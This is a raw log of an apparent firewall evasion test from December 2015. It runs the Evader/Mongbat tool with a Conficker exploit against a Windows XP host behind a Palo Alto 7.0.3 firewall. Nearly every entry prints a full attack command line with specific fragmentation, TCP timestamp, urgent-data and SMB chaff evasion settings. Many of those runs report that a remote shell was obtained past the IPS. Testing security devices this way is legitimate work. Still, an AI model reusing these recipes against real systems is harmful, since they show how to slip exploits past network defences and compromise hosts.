palo Alto 7.0.3 Evader Log

1. Palo Alto Networks Evader Log 7.0.3 December 2015
2. done after applying Best practices as recommended by Palo Alto here:
3. https://www.paloaltonetworks.com/documentation/70/pan-os/pan-os/threat-prevention/best-practices-for-securing-your-network-from-layer-4-and-layer-7-evasions.html
4. configured with the strictest profiles possible (IPS,AV,...)
5.  
6. PA IP is 10.62.90.3
7. Victim ip 10.35.1.207
8. attacker (evader) 10.62.90.110-120
9.  
10. begin Log File
11. Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.110 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=10 --min_evasions=2 --max_evasions=3 --passthrough --verifydelay=1000"
12. 2015-11-29 14:25:48 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
13. 2015-11-29 14:25:48 INFO Victim check disabled - will NOT notice if victim is no longer running
14. 2015-11-29 14:25:50 INFO Using rand seed cMvMFqDfRtA=
15. 2015-11-29 14:25:50 WARN evader is already running ; this may cause VICTIM CHECK FAILED messages!
16. 2015-11-29 14:25:50 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
17. Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
18.  
19. 0 runs averaging 0.00 runs / second ; progress: 1/43200.........................
20. 25 runs averaging 4.00 runs / second ; progress: 6/43200.......2015-11-29 14:25:58 INFO
21. Success. (10.62.90.117):
22. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52333 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=h1rO1S4WuZU --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435455","zero" --evasion=[smb_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
23. Info: Using random seed h1rO1S4WuZW
24. The following evasions are applied from stage smb_connect to msrpc_req:
25. - TCP timestamps echo reply value is sent in the wrong endianness
26. The following evasions are applied from stage smb_openpipe to msrpc_req:
27. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
28.  
29. Info: NetBIOS connection 10.62.90.117:52333 -> 10.35.1.207:445
30. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
31. Info: Sending MSRPC request with exploit
32. Info: Shell found, attack succeeded
33. Info: Shell closed
34. 0: Success.
35. ...........
36. 44 runs averaging 3.90 runs / second ; progress: 11/43200...............
37. 59 runs averaging 3.62 runs / second ; progress: 16/43200...............2015-11-29 14:26:10 INFO
38. Success. (10.62.90.119):
39. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33234 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=cC4uchCIvqM --evasion=[msrpc_bind,end]tcp_paws,"25%","5","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"3","random_alphanum" --verifydelay=1000 --payload=shell
40. Info: Using random seed cC4uchCIvqN
41. The following evasions are applied from stage smb_openpipe to msrpc_bind:
42. - Add a random alphanumeric urgent data byte to every 3 TCP segment.
43. The following evasions are applied from stage msrpc_bind to end:
44. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
45.  
46. Info: NetBIOS connection 10.62.90.119:33234 -> 10.35.1.207:445
47. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
48. Info: Sending MSRPC request with exploit
49. Info: Shell found, attack succeeded
50. Info: Command shell connection reset.
51. Info: CommandShell::SendCommand() - Failed to send string
52. Info: Shell closed
53. 0: Success.
54. .2015-11-29 14:26:10 INFO
55. Success. (10.62.90.116):
56. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59537 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=ePCbpjJvBgk --evasion=[start,end]tcp_inittsopt,"enable","normal" --evasion=[start,end]tcp_paws,"3","191194982","zero" --verifydelay=1000 --payload=shell
57. Info: Using random seed ePCbpjJvBgl
58. - TCP timestamps enabled, initial TCP timestamp is set to zero.
59. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 191194982> and has 0x00 bytes as payload
60.  
61. Info: NetBIOS connection 10.62.90.116:59537 -> 10.35.1.207:445
62. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
63. Info: Sending MSRPC request with exploit
64. Info: Shell found, attack succeeded
65. Info: CommandShell::SendCommand() - Failed to send string
66. Info: Command shell connection reset.
67. Info: Shell closed
68. 0: Success.
69. ............
70. 89 runs averaging 4.17 runs / second ; progress: 21/43200..............................
71. 119 runs averaging 4.51 runs / second ; progress: 26/43200..........................
72. 145 runs averaging 4.61 runs / second ; progress: 31/43200....2015-11-29 14:26:23 INFO
73. Success. (10.62.90.112):
74. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34345 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=GmSliZQobbI --evasion=[netbios_connect,smb_opentree]ipv4_frag,"80" --evasion=[netbios_connect,smb_opentree]ipv4_order,"lastfirst" --evasion=[smb_opentree,end]tcp_paws,"75%","5","random" --verifydelay=1000 --payload=shell
75. Info: Using random seed GmSliZQobbI
76. The following evasions are applied from stage netbios_connect to smb_opentree:
77. - IPv4 fragments with at most 80 bytes per fragment
78. - IPv4 fragments are sent in correct order except that the last fragment comes first
79. The following evasions are applied from stage smb_opentree to end:
80. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random bytes as payload
81.  
82. Info: NetBIOS connection 10.62.90.112:34345 -> 10.35.1.207:445
83. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
84. Info: Sending MSRPC request with exploit
85. Info: Shell found, attack succeeded
86. Info: Shell closed
87. 0: Success.
88. ...............
89. 165 runs averaging 4.52 runs / second ; progress: 36/43200...................
90. 184 runs averaging 4.43 runs / second ; progress: 42/43200.....................
91. 205 runs averaging 4.41 runs / second ; progress: 47/43200.......................
92. 228 runs averaging 4.42 runs / second ; progress: 52/43200.2015-11-29 14:26:43 INFO
93. Success. (10.62.90.114):
94. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61332 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=MTOzOSDi8Jw --evasion=[start,end]ipv4_opt,"8","inc","shuffletcp" --evasion=[smb_connect,msrpc_bind]smb_chaff,"21","write_flag","rand" --evasion=[msrpc_bind,end]tcp_paws,"1","268435455","zero" --verifydelay=1000 --payload=shell
95. Info: Using random seed MTOzOSDi8Jw
96. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
97. The duplicate packet has shuffled TCP payload
98. The following evasions are applied from stage smb_connect to msrpc_bind:
99. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
100. The following evasions are applied from stage msrpc_bind to end:
101. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
102.  
103. Info: NetBIOS connection 10.62.90.114:61332 -> 10.35.1.207:445
104. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
105. Info: Sending MSRPC request with exploit
106. Info: Shell found, attack succeeded
107. Info: Shell closed
108. 0: Success.
109. ................
110. 246 runs averaging 4.35 runs / second ; progress: 57/43200.........
111. 255 runs averaging 4.14 runs / second ; progress: 62/43200.
112. 256 runs averaging 3.84 runs / second ; progress: 67/432002015-11-29 14:26:58 INFO
113. Success. (10.62.90.119):
114. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29527 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=GOvj/FZON2U --evasion=[smb_connect,smb_opentree]smb_decoytrees,"7","5","7","random" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","268435454","random_alphanum" --verifydelay=1000 --payload=shell
115. Info: Using random seed GOvj/FZON2U
116. The following evasions are applied from stage smb_connect to smb_opentree:
117. - Before normal SMB writes, 7 SMB trees are opened and 5 writes are performed to them. The write payload is 7 random bytes.
118. The following evasions are applied from stage smb_openpipe to msrpc_req:
119. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
120.  
121. Info: NetBIOS connection 10.62.90.119:29527 -> 10.35.1.207:445
122. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
123. Info: Sending MSRPC request with exploit
124. Info: Shell found, attack succeeded
125. Info: Shell closed
126. 0: Success.
127. ...........
128. 268 runs averaging 3.74 runs / second ; progress: 72/43200..................
129. 286 runs averaging 3.73 runs / second ; progress: 77/43200........2015-11-29 14:27:10 INFO
130. Success. (10.62.90.114):
131. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22237 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=qVWS+7bkAvY --evasion=[smb_connect,smb_opentree]ipv4_opt,"75%","inc","random" --evasion=[smb_openpipe,end]tcp_paws,"75%","9","alphanumrandomized" --verifydelay=1000 --payload=shell
132. Info: Using random seed qVWS+7bkAva
133. The following evasions are applied from stage smb_connect to smb_opentree:
134. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
135. The duplicate packet has random bytes as payload
136. The following evasions are applied from stage smb_openpipe to end:
137. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
138.  
139. Info: NetBIOS connection 10.62.90.114:22237 -> 10.35.1.207:445
140. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
141. Info: Sending MSRPC request with exploit
142. Info: Shell found, attack succeeded
143. Info: Shell closed
144. 0: Success.
145. ......
146. 301 runs averaging 3.68 runs / second ; progress: 82/43200.......
147. 308 runs averaging 3.55 runs / second ; progress: 87/43200.......
148. 315 runs averaging 3.43 runs / second ; progress: 92/43200.........
149. 324 runs averaging 3.35 runs / second ; progress: 97/43200.........2015-11-29 14:27:31 INFO
150. Success. (10.62.90.119):
151. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33045 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=6Pjh3NY8nJk --evasion=[smb_connect,msrpc_bind]ipv4_frag,"1472" --evasion=[msrpc_bind,end]tcp_paws,"75%","4","alphanumrandomized" --verifydelay=1000 --payload=shell
152. Info: Using random seed 6Pjh3NY8nJn
153. The following evasions are applied from stage smb_connect to msrpc_bind:
154. - IPv4 fragments with at most 1472 bytes per fragment
155. The following evasions are applied from stage msrpc_bind to end:
156. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
157.  
158. Info: NetBIOS connection 10.62.90.119:33045 -> 10.35.1.207:445
159. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
160. Info: Sending MSRPC request with exploit
161. Info: Shell found, attack succeeded
162. Info: Shell closed
163. 0: Success.
164. .
165. 335 runs averaging 3.29 runs / second ; progress: 102/43200.
166. 336 runs averaging 3.15 runs / second ; progress: 107/43200....
167. 340 runs averaging 3.04 runs / second ; progress: 112/43200....
168. 344 runs averaging 2.94 runs / second ; progress: 117/43200.....
169. 349 runs averaging 2.86 runs / second ; progress: 122/43200..
170. 351 runs averaging 2.77 runs / second ; progress: 127/43200...
171. 354 runs averaging 2.68 runs / second ; progress: 132/43200
172. 354 runs averaging 2.59 runs / second ; progress: 137/43200.....
173. 359 runs averaging 2.53 runs / second ; progress: 142/43200.......
174. 366 runs averaging 2.49 runs / second ; progress: 147/43200....
175. 370 runs averaging 2.44 runs / second ; progress: 152/43200.....
176. 375 runs averaging 2.39 runs / second ; progress: 157/43200..
177. 377 runs averaging 2.33 runs / second ; progress: 162/43200.....
178. 382 runs averaging 2.29 runs / second ; progress: 167/43200......
179. 388 runs averaging 2.26 runs / second ; progress: 172/432002015-11-29 14:28:43 INFO
180. Success. (10.62.90.113):
181. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63628 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=nbC99GjwshU --evasion=[msrpc_bind,msrpc_req]smb_seg,"6" --evasion=[smb_openpipe,end]smb_writeandxpad,"1023","random_alphanum" --verifydelay=1000 --payload=shell
182. Info: Using random seed nbC99GjwshW
183. The following evasions are applied from stage smb_openpipe to end:
184. - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
185. The following evasions are applied from stage msrpc_bind to msrpc_req:
186. - SMB writes are segmented to contain at most 6 bytes of payload.
187.  
188. Info: NetBIOS connection 10.62.90.113:63628 -> 10.35.1.207:445
189. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
190. Info: Sending MSRPC request with exploit
191. Info: Shell found, attack succeeded
192. Info: CommandShell::SendCommand() - Failed to send string
193. Info: Command shell connection reset.
194. Info: Shell closed
195. 0: Success.
196. .
197. 390 runs averaging 2.20 runs / second ; progress: 177/43200
198. 390 runs averaging 2.14 runs / second ; progress: 182/43200
199. 390 runs averaging 2.09 runs / second ; progress: 187/43200
200. 390 runs averaging 2.03 runs / second ; progress: 192/43200
201. 390 runs averaging 1.98 runs / second ; progress: 197/43200
202. 390 runs averaging 1.93 runs / second ; progress: 202/43200
203. 390 runs averaging 1.88 runs / second ; progress: 207/43200
204. 390 runs averaging 1.84 runs / second ; progress: 212/43200
205. 390 runs averaging 1.80 runs / second ; progress: 217/43200
206. 390 runs averaging 1.76 runs / second ; progress: 222/43200
207. 390 runs averaging 1.72 runs / second ; progress: 227/43200
208. 390 runs averaging 1.68 runs / second ; progress: 232/43200
209. 390 runs averaging 1.64 runs / second ; progress: 237/43200
210. 390 runs averaging 1.61 runs / second ; progress: 242/43200
211. 390 runs averaging 1.58 runs / second ; progress: 247/43200
212. 390 runs averaging 1.55 runs / second ; progress: 252/43200
213. 390 runs averaging 1.52 runs / second ; progress: 257/43200
214. 390 runs averaging 1.49 runs / second ; progress: 262/43200
215. 390 runs averaging 1.46 runs / second ; progress: 267/43200
216. 390 runs averaging 1.43 runs / second ; progress: 272/43200
217. 390 runs averaging 1.41 runs / second ; progress: 277/43200
218. 390 runs averaging 1.38 runs / second ; progress: 282/43200
219. 390 runs averaging 1.36 runs / second ; progress: 287/43200
220. 390 runs averaging 1.33 runs / second ; progress: 292/43200
221. 390 runs averaging 1.31 runs / second ; progress: 297/43200
222. 390 runs averaging 1.29 runs / second ; progress: 302/43200
223. 390 runs averaging 1.27 runs / second ; progress: 307/43200Pid 8487 timed out - killed
224. 2015-11-29 14:31:01 INFO
225. Timed out (10.62.90.117):
226. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45741 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=LSFebZF03gA --evasion=[smb_opentree,end]smb_decoytrees,"6","2","3","random_alphanum" --evasion=[msrpc_bind,end]tcp_urgent,"8","random_alpha" --verifydelay=1000 --payload=shell
227. Info: Using random seed LSFebZF03gA
228. The following evasions are applied from stage smb_opentree to end:
229. - Before normal SMB writes, 6 SMB trees are opened and 2 writes are performed to them. The write payload is 3 random alphanumeric bytes.
230. The following evasions are applied from stage msrpc_bind to end:
231. - Add a random alphaurgent data byte to every 8 TCP segment.
232.  
233. Info: NetBIOS connection 10.62.90.117:45741 -> 10.35.1.207:445
234. Terminated
235.  
236. 391 runs averaging 1.25 runs / second ; progress: 312/43200
237. 391 runs averaging 1.23 runs / second ; progress: 317/43200Pid 8714 timed out - killed
238. 2015-11-29 14:31:09 INFO
239. Timed out (10.62.90.115):
240. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26549 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Q4MPR/Ipdco --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"8","38910" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
241. Info: Using random seed Q4MPR/Ipdcp
242. The following evasions are applied from stage smb_opentree to msrpc_req:
243. - Add a zero urgent data byte to every 2 TCP segment.
244. The following evasions are applied from stage smb_openpipe to msrpc_req:
245. - TCP packets are segmented to contain between 8 and 38910 bytes of payload.
246.  
247. Info: NetBIOS connection 10.62.90.115:26549 -> 10.35.1.207:445
248. Terminated
249.  
250. 392 runs averaging 1.22 runs / second ; progress: 322/43200...
251. 395 runs averaging 1.21 runs / second ; progress: 327/43200.2015-11-29 14:31:20 INFO
252. Success. (10.62.90.117):
253. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61076 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=ks72eUXp6pg --evasion=[start,netbios_connect]ipv4_frag,"40" --evasion=[smb_openpipe,end]tcp_paws,"1","10","random_alphanum" --verifydelay=1000 --payload=shell
254. Info: Using random seed ks72eUXp6pi
255. The following evasions are applied from stage start to netbios_connect:
256. - IPv4 fragments with at most 40 bytes per fragment
257. The following evasions are applied from stage smb_openpipe to end:
258. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has random alphanumeric bytes as payload
259.  
260. Info: NetBIOS connection 10.62.90.117:61076 -> 10.35.1.207:445
261. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
262. Info: Sending MSRPC request with exploit
263. Info: Shell found, attack succeeded
264. Info: Shell closed
265. 0: Success.
266.  
267. 397 runs averaging 1.19 runs / second ; progress: 332/43200.........
268. 406 runs averaging 1.20 runs / second ; progress: 337/43200........
269. 414 runs averaging 1.21 runs / second ; progress: 342/43200.Pid 9734 timed out - killed
270. 2015-11-29 14:31:33 INFO
271. Timed out (10.62.90.111):
272. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55680 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=gb9TlKpcDKQ --evasion=[netbios_connect,smb_opentree]netbios_chaff,"21","empty_unspec|small_unspec|http_post|msrpc_req" --evasion=[netbios_connect,end]tcp_recv_window,"130051" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
273. Info: Using random seed gb9TlKpcDKS
274. The following evasions are applied from stage netbios_connect to end:
275. - TCP receive window is set to at most 130051 bytes.
276. The following evasions are applied from stage netbios_connect to smb_opentree:
277. - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
278. The following evasions are applied from stage smb_openpipe to end:
279. - 75% probability to add a random urgent data byte to a TCP segment.
280.  
281. Info: NetBIOS connection 10.62.90.111:55680 -> 10.35.1.207:445
282. Terminated
283. .............
284. 429 runs averaging 1.23 runs / second ; progress: 347/43200Pid 9930 timed out - killed
285. 2015-11-29 14:31:38 INFO
286. Timed out (10.62.90.118):
287. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52808 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=e5vVqTJ0DxU --evasion=[start,smb_openpipe]ipv4_frag,"1480" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
288. Info: Using random seed e5vVqTJ0DxV
289. The following evasions are applied from stage start to smb_openpipe:
290. - IPv4 fragments with at most 1480 bytes per fragment
291. The following evasions are applied from stage smb_openpipe to msrpc_req:
292. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
293.  
294. Info: NetBIOS connection 10.62.90.118:52808 -> 10.35.1.207:445
295. Terminated
296. ...2015-11-29 14:31:40 INFO
297. Success. (10.62.90.115):
298. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27985 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=g2MlQoI2/qU --evasion=[smb_connect,end]tcp_paws,"5","6","alphanumrandomized" --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
299. Info: Using random seed g2MlQoI2/qW
300. The following evasions are applied from stage smb_connect to end:
301. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
302. The following evasions are applied from stage msrpc_req to end:
303. - TCP timestamps echo reply value is sent in the wrong endianness
304.  
305. Info: NetBIOS connection 10.62.90.115:27985 -> 10.35.1.207:445
306. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
307. Info: Sending MSRPC request with exploit
308. Info: Shell found, attack succeeded
309. Info: Shell closed
310. 0: Success.
311. ..
312. 436 runs averaging 1.24 runs / second ; progress: 353/43200
313. 436 runs averaging 1.22 runs / second ; progress: 358/43200Pid 10305 timed out - killed
314. 2015-11-29 14:31:51 INFO
315. Timed out (10.62.90.112):
316. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18240 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=lvOqSj7TLSw --evasion=[smb_connect,msrpc_req]ipv4_frag,"1480" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"8","268435454","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
317. Info: Using random seed lvOqSj7TLSy
318. The following evasions are applied from stage smb_connect to msrpc_req:
319. - IPv4 fragments with at most 1480 bytes per fragment
320. The following evasions are applied from stage smb_openpipe to msrpc_bind:
321. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
322. The following evasions are applied from stage msrpc_bind to msrpc_req:
323. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random bytes as payload
324.  
325. Info: NetBIOS connection 10.62.90.112:18240 -> 10.35.1.207:445
326. Terminated
327. ....
328. 441 runs averaging 1.22 runs / second ; progress: 363/43200.........
329. 450 runs averaging 1.22 runs / second ; progress: 368/43200...2015-11-29 14:32:00 INFO
330. Success. (10.62.90.115):
331. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11394 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=zKgv1BqIzcM --evasion=[smb_opentree,msrpc_req]netbios_chaff,"3","empty_unspec|empty_keepalive|broken_length" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"5","5","2","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_paws,"3","190383014","alpharandomized" --verifydelay=1000 --payload=shell
332. Info: Using random seed zKgv1BqIzcP
333. The following evasions are applied from stage smb_connect to msrpc_req:
334. - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
335. The following evasions are applied from stage smb_opentree to msrpc_req:
336. - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
337. The following evasions are applied from stage msrpc_bind to end:
338. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 190383014> and has original payload with alphabetic bytes randomized
339.  
340. Info: NetBIOS connection 10.62.90.115:11394 -> 10.35.1.207:445
341. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
342. Info: Sending MSRPC request with exploit
343. Info: Shell found, attack succeeded
344. Info: Shell closed
345. 0: Success.
346. .....
347. 459 runs averaging 1.23 runs / second ; progress: 373/43200...2015-11-29 14:32:04 INFO
348. Success. (10.62.90.117):
349. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60421 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=bHcAuyx6Oms --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","17330454","random_alphanum" --verifydelay=1000 --payload=shell
350. Info: Using random seed bHcAuyx6Omt
351. The following evasions are applied from stage smb_connect to msrpc_req:
352. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 17330454> and has random alphanumeric bytes as payload
353. The following evasions are applied from stage smb_openpipe to msrpc_bind:
354. - The SMB filename is obfuscated:
355. * Random characters case is changed
356.  
357. Info: NetBIOS connection 10.62.90.117:60421 -> 10.35.1.207:445
358. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
359. Info: Sending MSRPC request with exploit
360. Info: Shell found, attack succeeded
361. Info: CommandShell::SendCommand() - Failed to send string
362. Info: Command shell connection reset.
363. Info: Shell closed
364. 0: Success.
365. ......
366. 469 runs averaging 1.24 runs / second ; progress: 378/43200
367. 469 runs averaging 1.23 runs / second ; progress: 383/43200
368. 469 runs averaging 1.21 runs / second ; progress: 388/43200.........
369. 478 runs averaging 1.22 runs / second ; progress: 393/43200....Pid 10878 timed out - killed
370. 2015-11-29 14:32:25 INFO
371. Timed out (10.62.90.110):
372. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56599 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=23M8v1hEoSg --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"50%","empty_unspec|small_unspec|http_get" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
373. Info: Using random seed 23M8v1hEoSj
374. The following evasions are applied from stage smb_opentree to msrpc_bind:
375. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload.
376. The following evasions are applied from stage smb_openpipe to end:
377. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
378.  
379. Info: NetBIOS connection 10.62.90.110:56599 -> 10.35.1.207:445
380. Terminated
381. .....2015-11-29 14:32:28 INFO
382. Success. (10.62.90.112):
383. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36269 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=GVmZYMBCo6c --evasion=[smb_connect,end]ipv4_frag,"464" --evasion=[smb_connect,msrpc_req]tcp_paws,"50%","116466038","zero" --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"8","65534" --verifydelay=1000 --payload=shell
384. Info: Using random seed GVmZYMBCo6c
385. The following evasions are applied from stage smb_connect to end:
386. - IPv4 fragments with at most 464 bytes per fragment
387. The following evasions are applied from stage smb_connect to msrpc_req:
388. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 116466038> and has 0x00 bytes as payload
389. The following evasions are applied from stage smb_openpipe to msrpc_req:
390. - TCP packets are segmented to contain between 8 and 65534 bytes of payload.
391.  
392. Info: NetBIOS connection 10.62.90.112:36269 -> 10.35.1.207:445
393. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
394. Info: Sending MSRPC request with exploit
395. Info: Shell found, attack succeeded
396. Info: CommandShell::SendCommand() - Failed to send string
397. Info: Command shell connection reset.
398. Info: Shell closed
399. 0: Success.
400. .
